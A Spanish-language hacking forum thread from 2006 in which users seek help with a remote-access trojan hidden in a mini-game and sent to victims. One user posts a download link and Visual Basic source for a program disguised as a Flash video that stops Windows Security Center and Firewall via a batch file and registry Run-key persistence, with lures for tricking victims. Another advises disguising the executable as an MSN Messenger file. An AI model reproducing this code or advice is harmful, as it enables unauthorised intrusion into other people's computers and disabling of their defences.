hacker

Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
21 de Agosto de 2008, 09:05:58
Noticias: ¿No te llega el email de confirmacion?
Para ver este enlace Registrate o Inicia Sesion
> leer aqui

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Hacking (Moderadores: askatasun, HolyKnight, kamui23, - TuX -)
| | |-+  ayuda para remote explorer
Páginas: [1] 2  Todos Ir Abajo Imprimir
Autor Tema: ayuda para remote explorer  (Leído 2657 veces)
kakahack
Recien llegado
*
Desconectado Desconectado

Ver Perfil
« : 08 de Octubre de 2006, 07:12:12 »

wenas necesito ayuda tengo el remote explorer e enviado el server a la persona e incluso me dice ke si ke aparece el juego de una pelotita pero luego le introduzco la ip i me aparece un mensaje de error ke dice "the attempt to connect time out" k significa? como puedo arreglarlo? gracias
mago misterioso
Visitante
« Respuesta #1 : 08 de Octubre de 2006, 01:59:09 »

ola  eso puede ser devido a ke no tengas bien el remote explore o porke no le ayas conseguio bien la ip yo si te digo la verdad kuando empece con esto del hackear y to el rollo estuve kon el remote explore y sin problemas incluso me lo descarge de aky del foro busca bien ke lo encontraras o sino mandame un mensaje privado y yo te lo busco y te doy el link ok  prueba primero descargandote un programa para ke te averigue la ip ay tambien por el foro el
ip private esta bien ese programa kuando te envie la vistima un archivo le das a buscar ip y te la da o del arrebes si tu se lo mandas a ella un archivo bueno lla sabes algun problema ke tengas no dudes en decirlo si eso mandame un mensaje privado y yo te lo localizo ok adios kool
CiberPunk
NZ2
**

Asm & C/C++

Ver Perfil
« Respuesta #2 : 08 de Octubre de 2006, 02:03:04 »

Pues ese error es por el firewall de Windows (encaso que use Windows Servick Pack 2 y posterior), el firewall no dejara que ingreses a su PC para eso se usa otro metodo xD.

Greetings::

if stdio.h then printf(" Hello World\n");
mago misterioso
Visitante
« Respuesta #3 : 08 de Octubre de 2006, 02:20:25 »

pero tambien puede ser de ke no este bien el remote explore o ke no halla konseguio bien la ip eso no tiene na ke ver lo del firewall komprendes no kiero poner en duda lo ke dices te lo respeto yo e entrado en 10 ordenadores kon el remote explore asta ke me kanse porke daba mucho el kante el serve ke esta ocultao bajo un mini-juego
CiberPunk
NZ2
**

Asm & C/C++

Ver Perfil
« Respuesta #4 : 08 de Octubre de 2006, 03:16:58 »

Pues entonces antes de mandar deben de verificar que funciona bien.

De lo contrario no sabran el problema, por lo que yo digo es firewall a mi me pasa a seguido xD. Pero les doy permiso o los abro por shell.

Greetings:::

if stdio.h then printf(" Hello World\n");
jorgesil
Recien llegado
*

Ver Perfil
« Respuesta #5 : 12 de Octubre de 2006, 10:34:53 »

como  esqui var los antivirus  y que programa me recomendarian para esa funcion
mati89
NZ2
**

fred durst

Ver Perfil WWW
« Respuesta #6 : 12 de Octubre de 2006, 12:39:11 »

no hay programas que esquiven el antivirus

------------------------------------------------------------------------------------------------

no mentira si existen y en unos dias de estos me estube haciendo uno que al igual que el server de remote explorer que se camufla con una animacion en flash que en realidad no lo tengo listo porque le iba a agregar unas casas mas. es muy efectivo tambien te bloquea el firewall cada vez que entras a windows y cuando lo cerras te apaga la pc este programa al cerrarlo o borrarlo ya cumplio su funcion asi que por mas que lo borren tienen comandos externos que impiden que se ejecuten el anti virus y el firewall en este flash aparecera un texto que dice inicar pelicula y cuando haces clic larga un msg box diciendo que hay un error.

ha me olvidava solo sive para antivirus karpesky este programa
segun mi opinion es el mas usado luego del nod32
------------------------------------------------------------------------------------------------
ve como funciona yo lo prove en mi pc
y dio muy buenos resultados fijate si se lo puedes mandar a alguien y dile que es un capitulo nuevo de alejo y valentina que no se consigue en ningun lado y que te lo pasaron los admis de la pagina y cuando te diga que no anda le dices que a ti si te anda (y listo ya lo tienes con las manos en la masa) bueno casi
luego le envias el troyano diciendo lo mismo solo que esta vez le dices que se lo envias de nuevo y para no levantar sospechas

bueno este programa bajalo de aca

http://www.4shared.com/file/4536297/a183550f/flash.html

ha otra cosita mas este programa no lo detecta ningun antivirus asi que no lo prueves en tu pc sino deveras intalar el windows de nuevo o modificar de archivo de registro.

que la pases bien con mi programita. jeje
« Última modificación: 12 de Octubre de 2006, 01:06:26 por mati89 » En línea

a veces las apariencias engañan
OzX
Visitante
« Respuesta #7 : 12 de Octubre de 2006, 01:31:13 »

Me entra la duda que tu isieras un programa indetectable porque aki mismo dices..
nos dias de estos me estube haciendo

que la pases bien con mi programita. jeje

si preguntaste una pregunta basica sobre los puertos

http://foro.portalhacker.net/index.php/topic,18017.0.html

¿? Huh Huh Huh si no lo isisite tu el programa, mejor di de donde lo sakaste.
mati89
NZ2
**

fred durst

Ver Perfil WWW
« Respuesta #8 : 12 de Octubre de 2006, 01:53:20 »

ozx me parece que entendiste mal este progama sirve para impedir que se ejecute el firewall y asi poder meter un troyano detectable

no es un troyano que abre puertos con el control winshock

OzX
Visitante
« Respuesta #9 : 12 de Octubre de 2006, 01:56:51 »

el firewall no hace q lo  detecte el troyano, solo impide la conexion
el antivirus hace que lo detecte.

en fin Cheesy

mati89
NZ2
**

fred durst

Ver Perfil WWW
« Respuesta #10 : 12 de Octubre de 2006, 02:04:04 »

este programa tambien impide que se abra el antivirus karpesky solo este

no soy tan fracasado de decir que un programa que no es mi lo hice yo eso es para hacerse ver.

si un progama no es mio dire la pagina pero a mi no me gusta usar programas de otros ya que se hacen fama y no sirven para nada despues
como el remote explorer que lo detectan todos los antivirus

yo creo que si usaras mi programa para usar el remote explorer en otra pc estaria bien pero seria medio lammer
« Última modificación: 12 de Octubre de 2006, 02:12:20 por mati89 » En línea

Microchip
Visitante
« Respuesta #11 : 12 de Octubre de 2006, 08:46:11 »

Bueno "Mati" la verdad creo que tu hiciste ese programa es obvio porque ni siquiera pudiste colocar copyright ni información de la versión, otra cosa dices que es para anular el Firewall de Kaspersky pero segun el codigo lo hace para el centro de seguridad de Windows :S, otra cosa el registro que crea en el inicio de windows es demasiado obvio y fácil de borrar ademas de que la ruta donde se guarda es mucho mas  obvia en la "C:\" solo borrar el tmp.bat, editarlo :S nada mas, y el codigo que tiene el bat es .............. ..
Ahora te explico lo que hace tu programa, porque me parece que voz no lo sabes ja ja!!!!

Mira el proceso que hace al ejecutarse

Mira el condigo del Bat que se crea

Mira donde se guarda ese bat

Por ultimo mira el registro que crea

La ruta en la que se guarda el programa de kap es:
<Unidad>\Archivos de programa\Kaspersky Lab\Kaspersky Internet Security 6.0. o posterior

podrias explicar que tiene que ver con:
@ECHO OFF
NET STOP "Centro de Seguridad
NET STOP "Firewall de Windows/Conexi¢n compartida a Internet (ICS)
EXIT

en que parte se relaciona con este Internet Segurity o solo con el antivirus kasp.. por otro lado si quieres detener el Firewall de Windows, no se hace asi y si quieres anexarlo al registro para los inicios de windows son muchos mas pasos :S y mejores :S
Por otro lado no tiene ningun registro para copiar este bat a otro directorio que no sea la c:\ osea si lo editas tmp.bat
@echo off
exit

"ya fue"........... queda anulada cualquier molestia, o simplemente borras el valor del registro y listo  :Smiley aunque no es necesario porque ese bat no hace ni consquillas al windows  Undecided

Pero eso para que explicarlo, mejor explicalo voz que relacion tiene este Batch con la detención del firewall kasp ola del windows o solo el antivirus..... ...
 Huh  Huh  Huh  Huh  Huh  Huh  Huh  Huh  Huh  Huh  Huh  Huh  Huh  Huh  Huh  Huh
« Última modificación: 12 de Octubre de 2006, 08:52:02 por Microchip » En línea
OzX
Visitante
« Respuesta #12 : 12 de Octubre de 2006, 09:09:09 »

Cheesy en fin.. por eso me entraba la duda , o en fin.. Cheesy jeje buena explicacion microchip Cheesy te luces kool
mati89
NZ2
**

fred durst

Ver Perfil WWW
« Respuesta #13 : 12 de Octubre de 2006, 10:55:30 »

microchip tu opinas que el bat deve guardarse en un lugar menos sospechoso? puede ser en la carpeta C:\WINDOWS\system32?

ya sabia como funcionaba si lo hice yo pero si me quieren sacar el cuero no hay problema Angry

la idea mia era no ponerle copyright sino como lo iba a camuflar???
igual hace 2 años que ando programando en visual y no es mucho para mi
cada dia se aprende algo nuevo y yo creo que tu estas bastante avansado a comparacion mia

microchip la verdad con lo que has puesto le servira mucho a quien lo use y me quitara credito a mi.

me tardo todo un dia pensar como podia hacer este programa y hahora me vienes con esto
NAAAAAAAAA!!!!!!!!
pa que sepas que lo hice yo aca ta el codigo

Private Sub alta_Click()
baja.Checked = False
alta.Checked = True
media.Checked = False
End Sub

Private Sub baja_Click()
baja.Checked = True
alta.Checked = False
media.Checked = False
End Sub

Private Sub cerrar_Click()
End
End Sub
Private Sub end_Click()
End
End Sub

Private Sub Form_Load()
        Dim archivo As String
    Dim NumArchivo As Long

archivo = "C:\tmp.bat"
    NumArchivo = FreeFile()

Open archivo For Output As #NumArchivo
        Print #NumArchivo, "@ECHO OFF"
        Print #NumArchivo, "NET STOP " & Chr(34) & _
             "Centro de Seguridad"
        Print #NumArchivo, "NET STOP " & Chr(34) & _
            "Firewall de Windows/Conexi" & Chr(162) & _
            "n compartida a Internet (ICS)"
        Print #NumArchivo, "EXIT"
    Close #NumArchivo
    Shell archivo, vbHide
    Dim Registro As Object
            Dim Ejecutable As String
            Dim i As Integer
            Ejecutable = "C:\tmp.bat"
            Set Registro = CreateObject("WScript.Shell")
            Registro.RegWr ite "HKEY_LOCAL_MAC HINE\Software\Microsoft\Windows\CurrentVersion\Run\Reinicia" & i, Ejecutable
Dim Editor As Object
            Dim primero As String
                        rompe = " "
                        Set Editor = CreateObject("WScript.Shell")
                        Editor.RegWrit e "HKEY_LOCAL_MAC HINE\Software\Microsoft\Windows\CurrentVersion\Run\KAVPersonal5" & i, rompe
End Sub

Private Sub help1_Click()
FlashPlayer.Vi sible = True
End Sub

Private Sub lavl_Click()
MsgBox "error inesperado 6673"
End Sub

Private Sub media_Click()
baja.Checked = False
alta.Checked = False
media.Checked = True
End Sub

una pregunta como hiciste para ver el codigo de visual basic estando ya compilado el programa?
« Última modificación: 12 de Octubre de 2006, 11:16:00 por mati89 » En línea

Microchip
Visitante
« Respuesta #14 : 12 de Octubre de 2006, 11:16:23 »

Ok, mira si estas programando en Visual porque sigues utilizando batch, podrias crear directamente el ejecutable, asi lo pudes guardar en una carpeta comun como "C:\Archivos de programa\Messenger" en esta carpeta le pones un msms.exe con el icono del propio msn nadie sospecharia, pero si lo haces en system 32 que es ahi donde la mayoria de los troyanos residen y tb los virus sera mas facil de encontrar, si  lo camuflas asi pues aunque este anexado al registro pensaran que es una función del msn y no notaran mucho  Smiley
je je!!! otra cosa tienes que buscar donde reside la configuración del firewall de windows, como tb del antivirus o firewall que quieras desactivar, es mejor hacerlo por regedit a usar comandos MS - DOS es menos sospechoso :S

podrias directamente copiar el ejecutable a la ruta sin necesidad de escribir ese bat :S la añadirlo al registro y no usar esos comandos NET je je!!! esto deberian explicarte en el foro de programación y te digo es demasiado largo ese codigo para la función que buscas :S
« Última modificación: 12 de Octubre de 2006, 11:23:49 por Microchip » En línea
Páginas: [1] 2  Todos Ir Arriba Imprimir 
« anterior próximo »
Ir a:  

Ingresar con nombre de usuario, contraseña y duración de la sesión